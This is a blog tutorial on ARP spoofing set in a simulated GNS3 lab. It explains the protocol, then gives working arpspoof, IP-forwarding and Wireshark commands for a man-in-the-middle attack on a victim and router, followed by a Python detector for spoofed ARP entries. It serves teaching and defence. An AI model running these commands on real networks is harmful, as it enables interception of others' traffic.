Wednesday, July 31, 2013

ARP SPOOFING - VBox+GNS3 test


Address Resolution Protocol (ARP) is a protocol used to resolve network layer addresses (IP addresses) into link layer addresses (MAC addresses). ARP was defined by RFC 826 in 1982. It is a request-and-reply protocol and is used only within the boundaries of a single network, never across internetwork nodes.

ARP works on Ethernet networks as follows:
When a device wishes to send data to another target device over Ethernet, it must first determine the MAC address of that target given its IP address. These IP-to-MAC address mappings are taken from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot direct messages to that target until it obtains a new mapping. To do this, the initiating device first sends an ARP request as a broadcast message on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcast, allowing the initiating device to update its cache and proceed to deliver messages directly to the target. ARP does not provide any method for authenticating ARP replies on a network, so ARP replies can come from systems other than the one with the required Layer 2 address.

In ARP spoofing, the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.

In this tutorial we try a man-in-the-middle attack: the attacker sends ARP replies to the router stating that it is the victim, and also sends ARP replies to the victim stating that it is the router.

Set up a network with at least 2 hosts connected to an Ethernet switch. This switch is connected to a router. The network I used is shown below.

Network Simulation Software : GNS3


R1      : Cisco 3620 Router | 192.168.1.1
BT5R2   : BackTrack 5 R2    | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 : Linux Mint 12     | 192.168.1.3 | MAC_ID_2 | Victim

BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3 
This sends ARP replies to R1 stating that BT5R2 is 192.168.1.3,
so R1 saves MAC_ID_1 as the MAC ID of 192.168.1.3.
The reply is sent regularly, so don't close this process.

terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP replies to Mint 12 stating that BT5R2 is 192.168.1.1,
so Mint 12 saves MAC_ID_1 as the MAC ID of 192.168.1.1.
The reply is sent regularly, so don't close this process.

terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
This enables IP forwarding, so BT5R2 passes the intercepted packets on to their real destination.
BT5R2# wireshark & 
Start Wireshark so that you can capture the packets for verification.


Mint 12
Mint12# ping 192.168.1.1
Ping R1, then check Wireshark on BT5R2 for 'Redirect' packets.
Those packets will be highlighted in black.

R1
To check R1's ARP mapping:
R1#show arp
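
The effect of the two arpspoof processes is visible in the ARP tables themselves: MAC_ID_1 ends up mapped to more than one IP address. The following is an added example, not part of the original post, that parses `show arp` output from R1 and, going beyond the post, `ip neigh` output from the victim, then flags shared MACs and bindings that differ from a recorded baseline. The sample dumps, MAC values, interface names and function names are constructed for illustration.

```python
import re
from collections import defaultdict

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# MAC as Cisco prints it (aabb.ccdd.eeff) or as Linux prints it (aa:bb:cc:dd:ee:ff)
MAC_RE = re.compile(r"\b([0-9a-fA-F]{4}(?:\.[0-9a-fA-F]{4}){2}"
                    r"|[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})\b")

# Constructed sample: R1 "show arp" while both arpspoof processes run.
R1_SHOW_ARP = """\
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.1.1             -   cc00.0f28.0000  ARPA   Ethernet0/0
Internet  192.168.1.2             3   0800.27a1.b2c3  ARPA   Ethernet0/0
Internet  192.168.1.3             0   0800.27a1.b2c3  ARPA   Ethernet0/0
"""
# Constructed sample: "ip neigh" on Mint 12 at the same moment.
MINT_IP_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:a1:b2:c3 REACHABLE
192.168.1.2 dev eth0 lladdr 08:00:27:a1:b2:c3 STALE
192.168.1.9 dev eth0  FAILED
"""

def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to 12 lowercase hex digits.
    Header lines and incomplete entries (no MAC on the line) are skipped."""
    table = {}
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            table[ip.group(1)] = re.sub(r"[.:]", "", mac.group(1)).lower()
    return table

def shared_macs(table):
    """Return {mac: [ips]} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def changed_bindings(baseline, table):
    """Return {ip: (expected, seen)} where a recorded IP now has another MAC."""
    return {ip: (mac, table[ip]) for ip, mac in baseline.items()
            if ip in table and table[ip] != mac}

if __name__ == "__main__":
    for name, dump in (("R1", R1_SHOW_ARP), ("Mint 12", MINT_IP_NEIGH)):
        for mac, ips in shared_macs(parse_arp_table(dump)).items():
            print(f"{name}: {mac} claims {', '.join(ips)}")
```

A shared MAC can also be legitimate (proxy ARP, or one interface carrying several IP addresses), so the baseline comparison for the gateway address is the stronger signal.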



